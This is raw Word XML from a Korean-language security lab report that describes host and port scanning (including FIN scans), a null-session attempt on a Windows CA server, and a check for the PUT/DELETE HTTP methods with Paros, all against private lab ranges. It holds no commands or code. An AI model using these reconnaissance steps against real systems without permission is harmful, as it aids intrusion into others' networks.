            <wp:docPr id="31" name="그림 31" descr="https://lh4.googleusercontent.com/6wr4S9oUms0rhtOjN0gNR5hWUCtCOd2cjKWKtavvN0K1x47JyhRBNRSDLzShddvgVNsenyTI5tB8Xs3k7HHykfbeUVqIJHOChrxbuapojT6AgrjVD5RtC9LLBQUt7xCkw-zWC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6wr4S9oUms0rhtOjN0gNR5hWUCtCOd2cjKWKtavvN0K1x47JyhRBNRSDLzShddvgVNsenyTI5tB8Xs3k7HHykfbeUVqIJHOChrxbuapojT6AgrjVD5RtC9LLBQUt7xCkw-zWC7yv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4B5DDD0" wp14:editId="300B730B">
            <wp:extent cx="2499360" cy="1607820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="그림 32" descr="https://lh4.googleusercontent.com/SiWKJSpNy2KOpvSn7GsIdsb3vPn3zdXz1O9B4c6r8L_dyURdtJ7qfIx33GmJbEo3JRxq_hsxVuNCrnNLBrNSkvkFXufi2hppXxZ4Rj1lc7sv2HdpoajkNJRbZz_fKRb6DoH9bp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SiWKJSpNy2KOpvSn7GsIdsb3vPn3zdXz1O9B4c6r8L_dyURdtJ7qfIx33GmJbEo3JRxq_hsxVuNCrnNLBrNSkvkFXufi2hppXxZ4Rj1lc7sv2HdpoajkNJRbZz_fKRb6DoH9bpd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 xml:space="preserve">eb, DNS[Primary], DHCP[Primary], DB, Game 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100.0/24 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>대역대</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>와 DNS[Secondary], DHCP[Secondary], VPN, CA</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버가 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.200.0/24 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">대역대의 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Host Scanning </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>결과 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E005F" w:rsidRDefault="002E00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P</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ort Scanning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P</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:t>ort Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란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 xml:space="preserve">원하는 대상의 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 xml:space="preserve">를 확인할 수 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>있는 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E005F" w:rsidRPr="00032B7D" w:rsidRDefault="002E005F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2E005F" w:rsidRPr="00032B7D" w:rsidRDefault="002E005F" w:rsidP="002E005F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 xml:space="preserve">열려 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Port</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통해 </w:t>
      </w:r>
      <w:r w:rsidR="00032B7D" w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>어떠한 서비스를 수행 중인지 확인 가능하고 확인한 서비스를 이용해 공격을 시도할 수 있음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5E89AB9" wp14:editId="5784918F">
            <wp:extent cx="2453640" cy="1440180"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="33" name="그림 33" descr="https://lh5.googleusercontent.com/Gmrylfdu7XQfB3bW0_4bKUAMei-MOFbhcgBQA_USosI8gTIfweeEBFOWvUWos5HJ_UV9skiFv24TMgldSf8pcZOqSIHBVTLWRLK9yMllpi1J--ujsUKCdbQvtUzbaVRT17EyIh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Gmrylfdu7XQfB3bW0_4bKUAMei-MOFbhcgBQA_USosI8gTIfweeEBFOWvUWos5HJ_UV9skiFv24TMgldSf8pcZOqSIHBVTLWRLK9yMllpi1J--ujsUKCdbQvtUzbaVRT17EyIhj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45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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inux, 10.10.100.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를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>을 시도했을 때의 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034182E" w:rsidRDefault="0034182E" w:rsidP="0034182E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BB867BB" wp14:editId="1C7071AA">
            <wp:extent cx="2453640" cy="1386840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="18" name="그림 18" descr="https://lh3.googleusercontent.com/qE59ydD5Vt1t1sSDuL7uoFlcxPmkWjtk7k-OgQhXi4pNw1JAICBliMv5LFZH0Y-JjduBPCQe90yOJG_auSlhoxAm8TK59dfoEMuvmPh2NaD9KD5pr4bgTI7tq5gJde5N3SQm_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qE59ydD5Vt1t1sSDuL7uoFlcxPmkWjtk7k-OgQhXi4pNw1JAICBliMv5LFZH0Y-JjduBPCQe90yOJG_auSlhoxAm8TK59dfoEMuvmPh2NaD9KD5pr4bgTI7tq5gJde5N3SQm_DP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43ECE7D" wp14:editId="48844543">
            <wp:extent cx="2362200" cy="1386840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="34" name="그림 34" descr="https://lh5.googleusercontent.com/cnlAjUZ11amCchfYQdjUwIUazkvNvRBXA29wPMhOYl2KUfy8cLxngrgYFPUIjyUvKIp2qfaHaFhVEus8S3k6StBRPv7eh-YzM0nB8r9-9R2hIfkRTuaTxJhnzRG_MvNTz7jVi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cnlAjUZ11amCchfYQdjUwIUazkvNvRBXA29wPMhOYl2KUfy8cLxngrgYFPUIjyUvKIp2qfaHaFhVEus8S3k6StBRPv7eh-YzM0nB8r9-9R2hIfkRTuaTxJhnzRG_MvNTz7jViss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V</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PN 서버[Window 2008 R2, 10.10.200.50]</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 대상으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fin Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 시도했을 때 방화벽이 있다면 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이 되지 않고 방화벽이 없다면 열려 있는 P</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ort</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>들을 확인할 수 있다는 것을 알 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032B7D" w:rsidRDefault="00032B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182E" w:rsidRDefault="0034182E" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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N</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ull Session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N</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:t>ull Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이란 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032B7D" w:rsidRPr="00032B7D" w:rsidRDefault="00032B7D" w:rsidP="00032B7D">
      <w:pPr>
        <w:ind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W</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 설치된 네트워크에 다른 원격 컴퓨터에 유저 명과 패스워드를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Null</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 해서 접속할 수 있게 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>만드는 공격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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032B7D" w:rsidRPr="00032B7D" w:rsidRDefault="00032B7D" w:rsidP="00032B7D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:leftChars="0" w:left="1120"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ull Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로 연결되면 공격자는 시스템의 유저 명,</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공유정보 등을 열람할 수 있게 되고 심지어 </w:t>
      </w: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gistry</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE</w:t>
      </w:r>
      <w:r w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 일부에도 접근할 수 있게 됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032B7D" w:rsidRPr="00032B7D" w:rsidRDefault="00032B7D" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00032B7D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0FAB41C" wp14:editId="5CDC965F">
            <wp:extent cx="2392680" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="35" name="그림 35" descr="https://lh6.googleusercontent.com/EbmPaF_s-MRVuRaDyHTxnvsMBTxENeC_ynmafuRF7i2QPAa6Fc3X-5SpyBZfYxy05IHjAGefojiRPv1wweBNaYzOcdeP5ArZskcQ6H-4T1j6t256Za508KMOj2LbjhaSp3nC_D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EbmPaF_s-MRVuRaDyHTxnvsMBTxENeC_ynmafuRF7i2QPAa6Fc3X-5SpyBZfYxy05IHjAGefojiRPv1wweBNaYzOcdeP5ArZskcQ6H-4T1j6t256Za508KMOj2LbjhaSp3nC_DY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5B5D955D" wp14:editId="30380347">
            <wp:extent cx="2331720" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="그림 36" descr="https://lh5.googleusercontent.com/xBXmoc4-XkLvobW97MO7Wru8nLAvi3BCKYZrZpTLRixdz70EQ1zu3ZoNPqccGuRc1DI4bnCq6NYhJlpH1vS2pYdErKWVtm35vjQkm1vW01QFBvwIUcIsMNJPfuti9EIicgHMp3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BXmoc4-XkLvobW97MO7Wru8nLAvi3BCKYZrZpTLRixdz70EQ1zu3ZoNPqccGuRc1DI4bnCq6NYhJlpH1vS2pYdErKWVtm35vjQkm1vW01QFBvwIUcIsMNJPfuti9EIicgHMp3u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34182E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34182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indow</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 사용하는 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에 N</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ull Session</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">은 연결이 되지만 연결된 </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Null Session</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로는 서버의 접근할 수 없음,</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">아래 링크에서 확인 가능 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034182E" w:rsidRDefault="0034182E" w:rsidP="0034182E">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:leftChars="0" w:left="1120"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[https://social.technet.microsoft.com/Forums/windowsserver/en-US/841523db-8c4b-43a0-9f28-be7270f92e2b/disable-server-2008-null-sessions?forum=winservergen]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032B7D" w:rsidRDefault="00032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182E" w:rsidRDefault="0034182E" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>웹 보안</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034182E" w:rsidRPr="00032B7D" w:rsidRDefault="0034182E" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UT, Delete </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ethod </w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>확인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P</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:t xml:space="preserve">UT, Delete Method </w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032B7D" w:rsidRPr="001B30CB" w:rsidRDefault="00032B7D" w:rsidP="00032B7D">
      <w:pPr>
        <w:ind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>P</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UT, Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">같은 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용해 공격하고자 하는 페이지의 오브젝트 자원 및 오브젝트 구조 자원을 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>수정하는 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032B7D" w:rsidRPr="001B30CB" w:rsidRDefault="00032B7D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032B7D" w:rsidRPr="001B30CB" w:rsidRDefault="001B30CB" w:rsidP="00032B7D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:leftChars="0" w:left="1120"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">원격지 웹 서버에 파일을 생성하거나 삭제하는 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">와 유사한 기능을 구연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34182E" w:rsidRDefault="0034182E" w:rsidP="0034182E">
      <w:pPr>
        <w:ind w:left="785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DAA332E" wp14:editId="157A47CD">
            <wp:extent cx="2423160" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130" name="그림 130" descr="https://lh4.googleusercontent.com/fIFYRpjz5PVvUyW-kGFDYhUF51MTb9NGXRuGAr_j2JOV1lT97m_8bXtOpVYbr0lmJfjHvG6ReD72Y0rlUkpuLMzAbBJmAI8l8F46DsBuESOTJKsiJmsJBkGiTcpYiiLIGVEbJ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4.googleusercontent.com/fIFYRpjz5PVvUyW-kGFDYhUF51MTb9NGXRuGAr_j2JOV1lT97m_8bXtOpVYbr0lmJfjHvG6ReD72Y0rlUkpuLMzAbBJmAI8l8F46DsBuESOTJKsiJmsJBkGiTcpYiiLIGVEbJDX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A0F2571" wp14:editId="521C0EE1">
            <wp:extent cx="2148840" cy="335280"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="131" name="그림 131" descr="https://lh3.googleusercontent.com/OYPt-xyQrcKoQO3o4cH6yAzkhGshYTo4pY2hsbqrXrCy4dwTdxOMj61TwDt7d2a8E1zfOUSFvKdqwvDlq5JsowPtf6iL-APzvw7vh-XNI7nXhS7vVvKLVZ2HTdXCxTfkXAqXm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OYPt-xyQrcKoQO3o4cH6yAzkhGshYTo4pY2hsbqrXrCy4dwTdxOMj61TwDt7d2a8E1zfOUSFvKdqwvDlq5JsowPtf6iL-APzvw7vh-XNI7nXhS7vVvKLVZ2HTdXCxTfkXAqXm6m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ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>메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페이지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접속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Paros</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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통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P</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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하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HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전이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1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인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것을</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D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/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D8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1A2D88"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34182E" w:rsidRDefault="0034182E" w:rsidP="0034182E">
      <w:pPr>
        <w:ind w:left="760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B9DC955" wp14:editId="6F41B57E">
            <wp:extent cx="2407920" cy="234205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132" name="그림 132" descr="https://lh5.googleusercontent.com/lcuUwDfwLswBLdj1nQ668Zc8zP7sCaLQbLqhiI897H1l7CJPWM4jsIgXLzwVXX12MVBaaZJ2BvvzqgSGtzP9P-lC_NseU5bi40Eqy_8sctAmlVKBm_ndD1g2hCDwrWVJ3V6h2e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5.googleusercontent.com/lcuUwDfwLswBLdj1nQ668Zc8zP7sCaLQbLqhiI897H1l7CJPWM4jsIgXLzwVXX12MVBaaZJ2BvvzqgSGtzP9P-lC_NseU5bi40Eqy_8sctAmlVKBm_ndD1g2hCDwrWVJ3V6h2eWX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4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0B03E98" wp14:editId="545E01F8">
            <wp:extent cx="2034540" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="133" name="그림 133" descr="https://lh6.googleusercontent.com/gjXX0jDwN5lCbvc8gFZPHw_ag7PSUBXJ6KoRmxQTuWJtxv1a7G_ZJKIhG815ogopXGPm7Rvc6dUpO-QLnq0bJlZpV9kPVF7mhjDvjhXIa6p06xebSj6ryBHW_68Chtjodx4rcY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6.googleusercontent.com/gjXX0jDwN5lCbvc8gFZPHw_ag7PSUBXJ6KoRmxQTuWJtxv1a7G_ZJKIhG815ogopXGPm7Rvc6dUpO-QLnq0bJlZpV9kPVF7mhjDvjhXIa6p06xebSj6ryBHW_68Chtjodx4rcYR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2E" w:rsidRDefault="0034182E" w:rsidP="0034182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F55A287" wp14:editId="6348CB4A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>425450</wp:posOffset>
            </wp:positionH>
